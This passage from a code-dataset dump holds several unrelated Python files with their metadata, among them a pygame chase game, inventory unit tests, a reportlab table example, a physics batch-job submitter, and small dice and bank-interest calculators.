fh:\n        fh.write(json.dumps(d).encode('utf-8'))\n    \n\nif __name__==\"__main__\":\n    fs = glob.glob(str(PROCESSED_PATH/'*'))\n    args = parser.parse_args()\n    OUT_PATH = TRIPLET_PATH / str(args.dataset_name) \n    OUT_PATH.mkdir(parents=True, exist_ok=True)\n    pool = Pool(processes=args.n_cores)\n    pool.starmap(make_triplets, zip(fs,\n                                    [OUT_PATH]*len(fs),\n                                    [args.seed]*len(fs),\n                                    [args.n_examples]*len(fs),\n                                    [args.batch_size]*len(fs)))","sub_path":"reddit/preprocessing/triplet/.ipynb_checkpoints/make_triplets-checkpoint.py","file_name":"make_triplets-checkpoint.py","file_ext":"py","file_size_in_byte":5298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"102015639","text":"import pygame\r\nimport random\r\nimport sys\r\nimport time\r\nimport os\r\nimport profile\r\n\r\nusername = os.getlogin()\r\n\r\nround_score = 0\r\ntimer = 0\r\nwidth,height = 800,600\r\npygame.init()\r\nblack = (0,0,0)\r\nwhite = (255,255,255)\r\nblue = (0,0,255)\r\nred = (255,0,0)\r\nyellow = (255,230,0)\r\nyellow2 = (255,188,0)\r\norange = (255,128,0)\r\norange2 = (255,77,0)\r\n\r\ncollision_detected = False\r\ngameloop = True\r\nboard = pygame.display.set_mode((width,height)) #Creates the board\r\npygame.display.set_caption(\"Run\") #Used to set the title of the board window\r\nsmoothx,smoothy = 0,0 # SmoothX and SmoothY will be added to the player coordinates to allow constant motion while a user holds down one of the movement keys (WASD)\r\nfps = pygame.time.Clock() #A pygame Clock object used to cap the number of frames per second\r\nlevel = 1\r\nscoreboard = 0\r\nnum_scrap = 0\r\nsmallfont = pygame.font.SysFont('Verdana', 15) #Assigns the font verdana when displaying the score\r\nlargefont = pygame.font.SysFont('Verdana', 40)\r\nbackground = pygame.image.load(\"RunBackground.jpg\")\r\nstart_button = pygame.image.load(\"RunStartButton.png\")\r\nquit_button = pygame.image.load(\"RunQuitButton.png\")\r\nscorebackground = pygame.image.load(\"scorebackground.jpg\")\r\nsuperchargetext = pygame.image.load(\"supercharge.png\")\r\nmenu = True\r\n\r\n\r\nclass 
user: \r\n    def __init__(self,x,y):\r\n        self.type = 'player'\r\n        self.lives = 5 #Amount of lives the user has \r\n        self.x = x #Players x coordinate\r\n        self.y = y #Players y coordinate\r\n        self.width = 10 #Player Sprite Width\r\n        self.height = 10 #Player Sprite Height\r\n    \r\n    def draw(self):\r\n        #This restricts the user from leaving the board as it constantly updates the user coordinates to the edge values\r\n        if self.x <= 0:\r\n            self.x = 0 + (self.width/2)\r\n        if self.x >= width - self.width:\r\n            self.x = width - (self.width)\r\n        if self.y <= 0:\r\n            self.y = 0 + (self.height/2)\r\n        if self.y >= height - self.height:\r\n            self.y = height - (self.height)\r\n        #Applies smoothx and smoothy to the player coordinates so the player can move when a user holds down a key\r\n        self.x += smoothx\r\n        self.y += smoothy\r\n        pygame.draw.rect(board,white,(self.x,self.y,self.width,self.height)) #Displays the user sprite\r\n\r\n    def lose_life(self):\r\n        #Checks and updates the lives of a user; named lose_life so it does not clash with the self.lives attribute\r\n        global gameloop\r\n        if self.lives != 0: #If the player still has lives it subtracts one, as this function is triggered when a collision occurs with a bot\r\n            self.lives -= 1\r\n            #This will send each bot to the remove_bots method in the robot class\r\n            for bot in bots:\r\n                robot.remove_bots(bot)\r\n        if self.lives == 0:\r\n            gameloop = False #Stop the gameloop if the user no longer has any lives\r\n            lives_remaining() \r\n        \r\n        \r\n\r\nclass robot:\r\n    def __init__(self):\r\n        self.type = 'robot'\r\n        #x and y are randomly generated\r\n        x = list(range(0, width))\r\n        y = list(range(0,height))\r\n        safe_x = []\r\n        safe_y = []\r\n        for number in x:\r\n            if number not in range(275,525):\r\n                safe_x.append(number)\r\n        for number in y:\r\n            if number not in range(175,425):\r\n                safe_y.append(number)\r\n        self.x = random.choice(safe_x) #x is assigned from outside the safe radius\r\n        self.y = random.choice(safe_y) #y is assigned from outside the safe radius\r\n        for i in range(10):\r\n            try:\r\n                safe_x.remove(self.x + i)\r\n                safe_x.remove(self.x - i)\r\n                safe_y.remove(self.y + i)\r\n                safe_y.remove(self.y - i)\r\n            except ValueError:\r\n                pass\r\n\r\n        self.colour = red # Sets the colours of bots to red \r\n        self.ground = False # Ground is used to make a bot stationary when it turns into a scrap pile\r\n        self.width = 10\r\n        self.height = 10\r\n\r\n    def draw_bots(self):\r\n        #Displays the bots\r\n        pygame.draw.rect(board,self.colour,(self.x,self.y,self.width,self.height))\r\n    \r\n    def remove_bots(self):\r\n        #Removes the bots when the player collides with a robot and then it calls the function generate_bots to replace them with new ones\r\n        del bots[:]\r\n        generate_bots()\r\n    \r\n    def pathfinding(self):\r\n        #Compares the x and y values with the player's and moves towards it accordingly\r\n        #e.g. playerx = 5, botx = 2: since playerx > botx, botx += 1\r\n        speed = 3\r\n        if timer > 1000:\r\n            speed = 5\r\n        if self.x <= 0:\r\n            self.x = 0 + (self.width/2)\r\n        if self.x >= width - self.width:\r\n            self.x = width - (self.width)\r\n        if self.y <= 0:\r\n            self.y = 0 + (self.height/2)\r\n        if self.y >= height - self.height:\r\n            self.y = height - (self.height)    \r\n        if self.ground != True:\r\n            if player.x > self.x:\r\n                self.x += speed\r\n            if player.x < self.x:\r\n                self.x -= speed\r\n            if player.y > self.y:\r\n                self.y += speed\r\n            if player.y < self.y:\r\n                self.y -= speed\r\n    \r\n    def scrap_pile(self,other):\r\n        global num_scrap\r\n        self.ground = True #Makes the bot stationary\r\n        self.colour = blue #Makes the scrap pile blue\r\n        if other in bots:\r\n            bots.remove(other) #Removes one of the bots when two collide together so one scrap pile is created \r\n        pygame.draw.rect(board,blue,(self.x,self.y,self.width,self.height)) #Outputs the scrap pile\r\n        self.type = 'scrap'\r\n\r\n    \r\nclass collision:\r\n    def __init__(self):\r\n        super().__init__()\r\n    \r\n    def bot_collision_detection(self, other):\r\n        collision_detected = False\r\n        #checks each corner of this bot to see if it collided with another bot\r\n        if other.x + other.width >= self.x >= other.x and other.y + other.height >= self.y >= other.y:\r\n            collision_detected = True\r\n        if other.x + other.width >= self.x + self.width >= other.x and other.y + other.height >= self.y >= other.y:\r\n            collision_detected = True\r\n        if other.x + other.width >= self.x >= other.x and other.y + other.height >= self.y + self.height >= other.y:\r\n            collision_detected = True\r\n        if other.x + other.width >= self.x + self.width >= other.x and other.y + other.height >= self.y + self.height >= other.y:\r\n            collision_detected = True\r\n        if collision_detected == True:\r\n            robot.scrap_pile(self,other)\r\n    \r\n    def user_collision_detection(self, other):\r\n        #checks each corner of the player to see if it collided with a bot\r\n        collision_detected = False\r\n        if other.x + other.width >= self.x >= other.x and other.y + other.height >= self.y >= other.y:\r\n            collision_detected = True\r\n        if other.x + other.width >= self.x + self.width >= other.x and other.y + other.height >= self.y >= other.y:\r\n            collision_detected = True\r\n        if other.x + other.width >= self.x >= other.x and other.y + other.height >= self.y + self.height >= other.y:\r\n            collision_detected = True\r\n        if other.x + other.width >= self.x + self.width >= other.x and other.y + other.height >= self.y + self.height >= other.y:\r\n            collision_detected = True\r\n        if collision_detected == True:\r\n            user.lose_life(self)\r\n\r\ndef generate_bots():\r\n    player.x, player.y =int(width/2),int(height/2) #updates the player position back to the centre\r\n    global bots\r\n    global timer\r\n    timer = 0\r\n    if level == 1:\r\n        bots = [robot() for x in range(3)] #Creates 3 bot instances for level 1\r\n    if level == 2:\r\n        bots = [robot() for x in range(5)] #Creates 5 bot instances for level 2\r\n    if level == 3:\r\n        bots = [robot() for x in range(7)] #Creates 7 bot instances for level 3\r\n    if level == 4:\r\n        bots = [robot() for x in range(11)] #Creates 11 bot instances for level 4\r\n    if level == 5:\r\n        bots = [robot() for x in range(13)] #Creates 13 bot instances for level 5\r\n    if level == 6:\r\n        bots = [robot() for x in range(15)] #Creates 15 bot instances for level 6\r\n    if level > 6:\r\n        winning_screen()\r\n\r\n\r\ndef score(score):\r\n    #Displays the Score\r\n    text = smallfont.render('Score: ' + str(score), True, white)\r\n    board.blit(text, [0,0])\r\n\r\ndef display_lives():\r\n    if player.lives == 0:\r\n        winning_screen()\r\n    #Displays the Lives\r\n    else:\r\n        text = smallfont.render('Lives: ' + str(player.lives), True, white)\r\n        board.blit(text, [0, 15])\r\n\r\n\r\ndef countdown():\r\n    global round_score\r\n    round_score = scoreboard\r\n    for x in range(3, 0, -1):\r\n        board.fill(black)\r\n        text = smallfont.render('Level ' + str(level), True, white)\r\n        num_of_bots = smallfont.render('Number of Robots: ' + str(len(bots)), True, white)\r\n        numbers = smallfont.render('Starting In ' + str(x), True, white)\r\n        board.blit(text, [width/2- 50, height/2 - 50])\r\n        board.blit(num_of_bots, [width/2- 100, height/2 - 25])\r\n        board.blit(numbers, [width/2- 75, height/2]) \r\n        pygame.display.flip() \r\n        time.sleep(1)\r\n\r\ndef lives_remaining():\r\n    global scoreboard\r\n    global 
round_score\r\n    scoreboard = round_score\r\n    board.fill(black)\r\n    text = smallfont.render('Lives Remaining: ' + str(player.lives), True, white)\r\n    board.blit(text, [width/2- 90, height/2 - 50])\r\n    pygame.display.flip() \r\n    time.sleep(3)\r\n\r\ndef create_environment():\r\n    generate_bots()\r\n    countdown()\r\n\r\ndef super_charge_bar():\r\n    board.blit(superchargetext,[width/2 - 52, 0])\r\n    bar_width = 0.14 * timer\r\n    if timer < 500:\r\n        pygame.draw.rect(board,yellow,(325,20,bar_width,10))\r\n    if timer >= 500 and timer < 750:\r\n        pygame.draw.rect(board,yellow2,(325,20,bar_width,10))\r\n    if timer >= 750 and timer < 875:\r\n        pygame.draw.rect(board,orange,(325,20,bar_width,10))\r\n    if timer >= 875 and timer < 1000:\r\n        pygame.draw.rect(board,orange2,(325,20,bar_width,10))\r\n    if timer >= 1000:\r\n        pygame.draw.rect(board,red,(325,20,140,10))  \r\n    \r\n\r\ndef start_menu():\r\n    global menu\r\n    while menu == True:\r\n        for event in pygame.event.get():\r\n            if event.type == pygame.QUIT:\r\n                pygame.quit()\r\n                quit()\r\n        mouse = pygame.mouse.get_pos()\r\n        click = pygame.mouse.get_pressed()\r\n        if 125 + 172 > mouse[0] > 125 and 448 + 69 > mouse[1] > 448 and click[0] == 1: #the hitbox matches the start button blitted at (125,448)\r\n            menu = False\r\n            create_environment()\r\n            break\r\n        if 502 + 172 > mouse[0] > 502 and 448 + 69 > mouse[1] > 448 and click[0] == 1:\r\n            menu = False\r\n            pygame.quit()\r\n            quit()\r\n        board.blit(background,(0,0))\r\n        board.blit(start_button,(125,448))\r\n        board.blit(quit_button,(502,448))\r\n        pygame.display.update()\r\n\r\n\r\nplayer = user(int(width/2),int(height/2)) \r\nstart_menu()\r\n\r\ndef winning_screen():\r\n    global gameloop\r\n    global fps\r\n    gameloop = False\r\n    score_display = scoreboard\r\n    score_display = score_display + (player.lives * 500)\r\n    scoretext = largefont.render(str(score_display), True, white)\r\n    x_shift = len(str(score_display)) * 11.5\r\n    board.blit(scorebackground, [0,0])\r\n    board.blit(scoretext, [width/2- x_shift, height/2]) \r\n    pygame.display.update()\r\n    save(score_display)\r\n    time.sleep(5)\r\n    pygame.display.quit()\r\n    pygame.quit()\r\n    sys.exit()\r\n\r\n\r\ndef save(score_display):\r\n    user_profile = profile.User_Profile(username)\r\n    user_profile.update_score(score_display)\r\n    user_profile.add_game_record('Run')\r\n    user_profile.save()\r\n\r\n \r\n#MAIN GAME LOOP\r\nwhile gameloop == True:\r\n    num_scraps = 0\r\n\r\n    fps.tick(60) #Sets FPS to 60\r\n    \r\n    for event in pygame.event.get(): #Checks each event\r\n        if event.type == pygame.QUIT: #If the event is QUIT (the user clicks the X in the top right corner) the window closes\r\n            pygame.quit()\r\n            quit()\r\n        if event.type == pygame.KEYDOWN:\r\n            if event.key == pygame.K_w:\r\n                smoothy = -5\r\n            elif event.key == pygame.K_s:\r\n                smoothy = 5\r\n            elif event.key == pygame.K_a:\r\n                smoothx = -5\r\n            elif event.key == pygame.K_d:\r\n                smoothx = 5\r\n        elif event.type == pygame.KEYUP:\r\n            if event.key == pygame.K_w and smoothy < 0:\r\n                smoothy = 0\r\n            elif event.key == pygame.K_s and smoothy > 0:\r\n                smoothy = 0\r\n            elif event.key == pygame.K_a and smoothx < 0:\r\n                smoothx = 0\r\n            elif event.key == pygame.K_d and smoothx > 0:\r\n                smoothx = 0    \r\n    \r\n    \r\n    board.fill(black) #Fills the board with black\r\n    for bot in bots:\r\n        #For every bot it draws it and runs the pathfinding function to move towards the user\r\n        robot.draw_bots(bot)\r\n        robot.pathfinding(bot)\r\n        #Checks for collisions between bots and bots as well as user and bots\r\n        for x in bots:\r\n            if bot != x:\r\n                collision.bot_collision_detection(bot,x)\r\n        collision.user_collision_detection(player,bot) #Check the player against each bot\r\n    scoreboard += 1 #Adds one to the scoreboard each time\r\n    score(scoreboard)\r\n    display_lives()\r\n    for bot in bots:\r\n        if bot.type == 'scrap':\r\n            num_scraps += 1\r\n    if num_scraps == len(bots):\r\n        level += 1\r\n        generate_bots()\r\n        countdown()\r\n    timer += 1\r\n    player.draw()\r\n    super_charge_bar()\r\n    pygame.display.update()\r\n\r\npygame.quit()\r\nquit()  \r\n","sub_path":"Source/Yr7Test/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":13796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"161698707","text":"\"\"\"Module for unit tests for inventory management\"\"\"\n\n# pylint: disable=wrong-import-position\n\nimport unittest\nfrom unittest import TestCase\nfrom unittest.mock import patch\n\nfrom inventory_management.inventory_class import Inventory\nfrom inventory_management.furniture_class import Furniture\nfrom inventory_management.electric_appliances_class import ElectricAppliances\nfrom inventory_management.market_prices import get_latest_price\nimport inventory_management.main as Main\n\n\nclass InventoryTest(TestCase):\n    \"\"\"Unit tests for Inventory module\"\"\"\n\n    def setUp(self):\n        \"\"\"Sets up item\"\"\"\n        self.item = Inventory(100, \"Fridge\", 2500, 650)\n\n    def test_init(self):\n        \"\"\"Test initializes and attributes for Inventory\"\"\"\n        self.assertEqual(self.item.product_code, 100)\n        self.assertEqual(self.item.description, \"Fridge\")\n        self.assertEqual(self.item.market_price, 2500)\n        self.assertEqual(self.item.rental_price, 650)\n\n    def test_dict(self):\n        \"\"\"Test dictionary for Inventory\"\"\"\n        inv_dict = Inventory(100, \"Fridge\", 2500, 650).return_as_dictionary()\n        self.assertEqual(inv_dict,\n                         {\"product_code\": 100, \"description\": \"Fridge\",\n                          \"market_price\": 2500, \"rental_price\": 650})\n\n\nclass FurnitureTest(TestCase):\n    \"\"\"Unit tests for Furniture module\"\"\"\n\n    def setUp(self):\n        \"\"\"Sets up product\"\"\"\n        self.product = Furniture(200, \"Chair\", 150, 50, \"Wood\", \"Small\")\n\n    def test_init(self):\n        \"\"\"Test initializes and attributes for Furniture\"\"\"\n        self.assertEqual(self.product.product_code, 200)\n        self.assertEqual(self.product.description, \"Chair\")\n        self.assertEqual(self.product.market_price, 150)\n        self.assertEqual(self.product.rental_price, 50)\n        self.assertEqual(self.product.material, \"Wood\")\n        self.assertEqual(self.product.size, \"Small\")\n\n    def test_return(self):\n        \"\"\"Test dictionary for Furniture\"\"\"\n        pro_dict = Furniture(200, \"Chair\", 150, 50, \"Wood\",\n                             \"Small\").return_as_dictionary()\n        self.assertEqual(pro_dict,\n                         {\"product_code\": 200, \"description\": \"Chair\",\n                          \"market_price\": 150, \"rental_price\": 50,\n                          \"material\": \"Wood\", \"size\": \"Small\"})\n\n\nclass ElectricAppliancesTest(TestCase):\n    \"\"\"Unit tests for ElectricAppliances module\"\"\"\n\n    def setUp(self):\n        \"\"\"Sets up appliance\"\"\"\n        self.appliance = ElectricAppliances(300, \"TV\", 4000, 250, \"Sony\", 450)\n\n    def test_init(self):\n        \"\"\"Test initializes and attributes for Electric Appliances\"\"\"\n        self.assertEqual(self.appliance.product_code, 300)\n        self.assertEqual(self.appliance.description, \"TV\")\n        self.assertEqual(self.appliance.market_price, 4000)\n        self.assertEqual(self.appliance.rental_price, 250)\n        self.assertEqual(self.appliance.brand, \"Sony\")\n        self.assertEqual(self.appliance.voltage, 450)\n\n    def test_return(self):\n        \"\"\"Test dictionary for Electric Appliances\"\"\"\n        app_dict = 
ElectricAppliances(300, \"TV\", 4000, 250, \"Sony\",\n 450).return_as_dictionary()\n self.assertEqual(app_dict,\n {\"product_code\": 300, \"description\": \"TV\",\n \"market_price\": 4000, \"rental_price\": 250,\n \"brand\": \"Sony\", \"voltage\": 450})\n\n\nclass MarketPricesTest(TestCase):\n \"\"\"Unit tests for Market Prices module\"\"\"\n def test_mark_price(self):\n \"\"\"Test price\"\"\"\n self.assertEqual(get_latest_price(25), 24)\n\n\nclass MainTest(TestCase):\n \"\"\"Unit tests for Main module\"\"\"\n\n def test_main_menu_1(self):\n \"\"\"Test main menu 1\"\"\"\n with patch(\"builtins.input\", side_effect=\"1\"):\n self.assertEqual(Main.main_menu().__name__, \"add_new_item\")\n\n def test_main_menu_2(self):\n \"\"\"Test main menu 2\"\"\"\n with patch(\"builtins.input\", side_effect=\"2\"):\n self.assertEqual(Main.main_menu().__name__, \"item_info\")\n\n def test_main_menu_q(self):\n \"\"\"Test main menu q\"\"\"\n with patch(\"builtins.input\", side_effect=\"q\"):\n self.assertEqual(Main.main_menu().__name__, \"exit_program\")\n\n def test_get_price(self):\n \"\"\"Test get price\"\"\"\n self.assertEqual(Main.get_price(20), 24)\n\n def test_add_new_item(self):\n \"\"\"Test add new item\"\"\"\n Main.FULL_INVENTORY = {}\n new_item = [400, \"Couch\", 25, \"n\", \"n\"]\n inventory = {400: {\"product_code\": 400, \"description\": \"Couch\",\n \"market_price\": 24, \"rental_price\": 25}}\n with patch(\"builtins.input\", side_effect=new_item):\n Main.add_new_item()\n self.assertEqual(Main.FULL_INVENTORY, inventory)\n\n def test_add_new_furniture(self):\n \"\"\"Test add new furniture\"\"\"\n Main.FULL_INVENTORY = {}\n new_furniture = [500, \"Table\", 245, \"y\", \"Metal\", \"Large\"]\n inventory = {500: {\"product_code\": 500, \"description\": \"Table\",\n \"market_price\": 24, \"rental_price\": 245,\n \"material\": \"Metal\", \"size\": \"Large\"}}\n with patch(\"builtins.input\", side_effect=new_furniture):\n Main.add_new_item()\n self.assertEqual(Main.FULL_INVENTORY, inventory)\n\n def test_add_new_electric_appliance(self):\n \"\"\"Test add new electric appliance\"\"\"\n Main.FULL_INVENTORY = {}\n new_appliance = [600, \"Washer\", 50, \"n\", \"y\", \"LG\", 220]\n inventory = {600: {\"product_code\": 600, \"description\": \"Washer\",\n \"market_price\": 24, \"rental_price\": 50,\n \"brand\": \"LG\", \"voltage\": 220}}\n with patch(\"builtins.input\", side_effect=new_appliance):\n Main.add_new_item()\n self.assertEqual(Main.FULL_INVENTORY, inventory)\n\n def test_item_info(self):\n \"\"\"Test item information\"\"\"\n item_dict = {\"product_code\": 3, \"description\": \"PS4\",\n \"market_price\": 24, \"rental_price\": 98}\n expected = (\"product_code: 3\\n\"\n \"description: PS4\\n\"\n \"market_price: 24\\n\"\n \"rental_price: 98\\n\")\n with patch(\"builtins.input\", side_effect=\"3\"):\n Main.FULL_INVENTORY[\"3\"] = item_dict\n self.assertEqual(Main.item_info(), print(expected))\n\n with patch(\"builtins.input\", side_effect=\"4\"):\n Main.FULL_INVENTORY = {}\n expected = \"Item not found in inventory\"\n self.assertEqual(Main.item_info(), print(expected))\n\n def test_exit(self):\n \"\"\"Test exit\"\"\"\n with self.assertRaises(SystemExit):\n Main.exit_program()\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"students/ramkumar_rajanbabu/lesson_01/assignment/test_unit.py","file_name":"test_unit.py","file_ext":"py","file_size_in_byte":6806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"332016628","text":"from 
reportlab.lib.pagesizes import letter\nfrom reportlab.platypus import SimpleDocTemplate, Table, TableStyle\nfrom reportlab.lib import colors\n\n\ndef table_multi_font():\n    doc = SimpleDocTemplate(\"table_multi_font.pdf\", pagesize=letter)\n    story = []\n    data = [\n        ['col_{}'.format(x) for x in range(1, 6)],\n        [str(x) for x in range(1, 6)],\n        ['a', 'b', 'c', 'd', 'e']\n    ]\n\n    # Don't set the font and the font size with separate styles; the FONT command takes both at once\n    tblstyle = TableStyle([('FONT', (0, 0), (-1, 0), 'Times-Roman'),\n                           ('FONT', (0, 1), (-1, 1), 'Helvetica', 24),\n                           ('FONT', (0, 2), (-1, 2), 'Courier', 12)])\n\n    tbl = Table(data)\n    tbl.setStyle(tblstyle)\n\n    story.append(tbl)\n    doc.build(story)\n\n\nif __name__ == \"__main__\":\n    table_multi_font()\n","sub_path":"tables/table_multiple_font.py","file_name":"table_multiple_font.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"609443116","text":"#!/usr/bin/env python\n\nimport argparse\nimport os\nimport glob\nimport sys\n\nimport batchelor\nimport pyRootPwa\n\nfrom Commander import Commander\nfrom Submitter import Submitter\n\nif __name__ == \"__main__\":\n\n\tparser = argparse.ArgumentParser(description=\"submit jobs from list\")\n\tparser.add_argument(\"inputFolder\", type=str, metavar=\"dir\", default=\"/gpfs/work/pr83mo/no72doz2/DATA/3piC/finalfits/bestfits\", help=\"input folder with fit result files\")\n\tparser.add_argument(\"-c\", \"--rpwaConfigFileName\", type=str, metavar=\"rpwaConfigFileName\", default=\"/gpfs/work/pr83mo/no72doz2/DATA/3piC/rootpwa.config\", help=\"config file for RPWA\")\n\tparser.add_argument(\"-b\", \"--batchelorConfigFileName\", type=str, metavar=\"batchelorConfigFileName\", default=\"/home/hpc/pr83mo/no72doz2/workspace/batchelor/charly.config\", help=\"config file for batchelor\")\n\tparser.add_argument(\"-d\", \"--jobOutputDirectory\", type=str, metavar=\"jobOutputDirectory\", default=\"batchelorOut\", help=\"directory to store the jobs' output\")\n\tparser.add_argument(\"-j\", \"--jobName\", type=str, metavar=\"jobName\", dest=\"jobName\", default=\"cov\", help=\"job name to use in submission\")\n\tparser.add_argument(\"-t\", \"--tBin\", type=str, metavar=\"bin\", dest=\"tBin\", default=\"0.1;0.112853\", help=\"tBin semicolon separated (default: '0.1;0.112853')\")\n\tparser.add_argument(\"-s\", \"--simulate\", action=\"store_true\", help=\"do not actually submit anything\")\n\tparser.add_argument(\"--binIDstart\", type=int, metavar=\"#\", default=-1, help=\"binID start (default: all bins)\")\n\tparser.add_argument(\"--binIDend\", type=int, metavar=\"#\", default=-1, help=\"binID end (default: all bins)\")\n\tparser.add_argument(\"--binIDstep\", type=int, metavar=\"#\", default=1, help=\"binID step\")\n\t\n\targs = parser.parse_args()\n\n\tsubmitter = Submitter(args.batchelorConfigFileName, args.jobOutputDirectory, args.simulate)\n\tsubmissionArgs = []\n\tjobName = args.jobName\n\tparentFolder = os.path.dirname(os.path.realpath(args.rpwaConfigFileName))\n\n\tconfig = pyRootPwa.rootPwaConfig()\n\tif not config.initialize(args.rpwaConfigFileName):\n\t\tpyRootPwa.utils.printErr(\"loading config file '\" + args.rpwaConfigFileName + \"' failed. Aborting...\")\n\t\tsys.exit(1)\n\tpyRootPwa.core.particleDataTable.readFile(config.pdgFileName)\n\tfileManager = pyRootPwa.loadFileManager(config.fileManagerPath)\n\tif not fileManager:\n\t\tpyRootPwa.utils.printErr(\"loading the file manager failed. 
Aborting...\")\n\t\tsys.exit(1)\n\tbinIDs = fileManager.getBinIDList()\n\tif args.binIDstart != -1 and args.binIDend != -1:\n\t\tbinIDs = range(args.binIDstart, args.binIDend, args.binIDstep)\n\n\tfor binID in binIDs:\n\t\trootpwaDir = os.path.expandvars(\"$ROOTPWA\")\n\t\ttBins = args.tBin.split(\";\")\n\t\tcommander = Commander(rootpwaDir + \"/pyInterface/calcCovMatrixForFitResult.py\")\n\t\tcommander.addArgument(\"-f\", args.inputFolder + \"/\" + str(binID) + \".root\")\n\t\tcommander.addArgument(\"-c\", args.rpwaConfigFileName)\n\t\tcommander.addArgument(\"-b\", str(binID))\n\t\tcommander.addArgument(\"-B\", \"'tPrime;\" + args.tBin + \"'\")\n\t\tcommander.addArgument(\"-g\", parentFolder + \"/ints/\" + str(binID) + \"/integral.generated_\" + tBins[0] + \"_\" + tBins[1] + \".root\")\n\t\tcommander.addArgument(\"-a\", parentFolder + \"/ints/\" + str(binID) + \"/integral.accepted_\" + tBins[0] + \"_\" + tBins[1] + \".root\")\n\t\tcommander.addArgument(\"-w\", parentFolder + \"/wavelists/wavelist\" + str(binID))\n\t\toutputFilePath = args.inputFolder + \"/cov\" + str(binID) + \".root\"\n\t\tcommander.addPosArgument(outputFilePath)\n\t\tjobOut = args.jobOutputDirectory + \"/\" + jobName + \"_\" + str(binID) + \".log\"\n\t\tif not os.path.isfile(outputFilePath):\n\t\t\tsubmissionArgs.append([commander.getCommand(), jobOut, jobName])\n\n\tsubmitter.submitJobs(submissionArgs)\n","sub_path":"scripts/batchelorScripts/calcCovMatrixForRootFilesInFolder.py","file_name":"calcCovMatrixForRootFilesInFolder.py","file_ext":"py","file_size_in_byte":3655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"389365974","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport random\r\nd = np.int(input(\"What die are you rolling? :\"))\r\nn = np.int(input(\"How many are you rolling? :\"))\r\n\r\nplus = input(\"Are their any added modefiers (y/n)? :\")\r\nif plus == \"y\":\r\n added = np.int(input(\"What is the modefier value? :\"))\r\nelse:\r\n added = 0 \r\n\r\nresistance = input(\"Is the targer vulnerable, resistante or nutural (v/r/n)? :\")\r\nif resistance == \"v\":\r\n multiplier = 2\r\nelif resistance == \"r\":\r\n multiplier = 1/2\r\nelif resistance == \"n\":\r\n multiplier = 1\r\nelse:\r\n multiplier = 1\r\n \r\nsave = input(\"Is there a saving throw (y/n)? :\")\r\nif save == \"y\":\r\n dc = np.int(input(\"What is the dc? :\"))\r\nelse:\r\n dc = 100\r\n\r\niterations = 100000\r\ndamage = []\r\nfor i in range(0,iterations):\r\n indiDamage = multiplier*(np.sum([random.randint(1,d) for i in range(n)])+added)\r\n savethrow = random.randint(1,20)\r\n if savethrow >= dc:\r\n indiDamage = indiDamage/2\r\n damage.append(indiDamage) \r\n\r\nexpected_damage = np.mean(damage)\r\n\r\nprint(expected_damage)\r\nplt.hist(damage)\r\nplt.show()\r\n","sub_path":"Expecteddamage.py","file_name":"Expecteddamage.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"263605064","text":"# P is the amount deposited! ---- bank_p_D\n# R is the stated interest rate! ---- bank_r_I\n# M is the interest compounded per year! 
---- bank_m_C\n\n# List\nbank_p_D = [0]*3\nbank_r_I = [0]*3\nbank_m_C = [0]*3\nequation = [0]*3\napy = [0]*3\n\n# This loop will run again if something goes wrong.\nwhile True:\n\n    # guards against dividing by zero (m = 0) and against non-numeric input (ValueError)\n    try:\n        # Read the three banks' inputs\n        for a in range(0, 3):\n            print(\"Bank --\", a + 1)\n            bank_p_D[a] = float(input(\" Enter the amount deposited: $ \"))\n            bank_r_I[a] = float(input(\" Enter the stated interest rate (%):\")) / 100  # convert the percentage to a decimal rate\n            bank_m_C[a] = float(input(\" Enter the interest compounded per year: \"))\n\n        # Compute the compound amount and the APY for each bank\n        for b in range(0, 3):\n            # Compound amount = P * (1 + r/m)**m\n            equation[b] = bank_p_D[b] * (1 + bank_r_I[b] / bank_m_C[b]) ** bank_m_C[b]\n\n            # APY = (1 + r/m)**m - 1\n            # e.g. r = 0.05 compounded monthly (m = 12) gives (1 + 0.05/12)**12 - 1, roughly 0.0512\n            apy[b] = (1 + bank_r_I[b] / bank_m_C[b]) ** bank_m_C[b] - 1\n\n        print(\"\\n\")\n\n        # This (if/elif) chain only reports something when two or more banks have the same APY\n        if apy[0] == apy[1] == apy[2]:\n            print(\"NOTE: All 3 banks offer the same APY \")\n        elif apy[0] == apy[1]:\n            print(\"NOTE: Bank 1 interest rate same as Bank 2, in this case we will say: they both offer the same APY \")\n        elif apy[0] == apy[2]:\n            print(\"NOTE: Bank 1 interest rate same as Bank 3, in this case we will say: they both offer the same APY \")\n        elif apy[1] == apy[2]:\n            print(\"NOTE: Bank 2 interest rate same as Bank 3, in this case we will say: they both offer the same APY \")\n        else:\n            pass\n\n        if apy[0] > apy[1] and apy[0] > apy[2]:\n            print(\" Bank 1 interest rate is higher than Bank 2 and Bank 3\")\n        elif apy[1] > apy[0] and apy[1] > apy[2]:\n            print(\" Bank 2 interest rate is higher than Bank 1 and Bank 3\")\n        elif apy[2] > apy[0] and apy[2] > apy[1]:\n            print(\" Bank 3 interest rate is higher than Bank 1 and Bank 2\")\n        else:\n            print(\" They are all equal!!!\")\n        break # Break the while loop\n\n    except ZeroDivisionError: # can't divide by 0\n        print(\"Can't use 0\",\"\\n\")\n        print(\"Try Again\",\"\\n\")\n    except ValueError: # catches non-numeric input, EX: a b c\n        print(\"Try Again\", \"\\n\")\n\n    \n","sub_path":"Programming 1/Project--5--Decision-Structures/One.py","file_name":"One.py","file_ext":"py","file_size_in_byte":2832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"203305626","text":"#!/usr/bin/python3\nimport Adafruit_DHT\nimport threading\nimport time\nimport json\nimport redis\nimport requests\nfrom datetime import datetime\nimport os\n\n#Load the emulator to avoid errors\n#from EmulatorGUI import GPIO\nsensor = Adafruit_DHT.DHT22\npin = 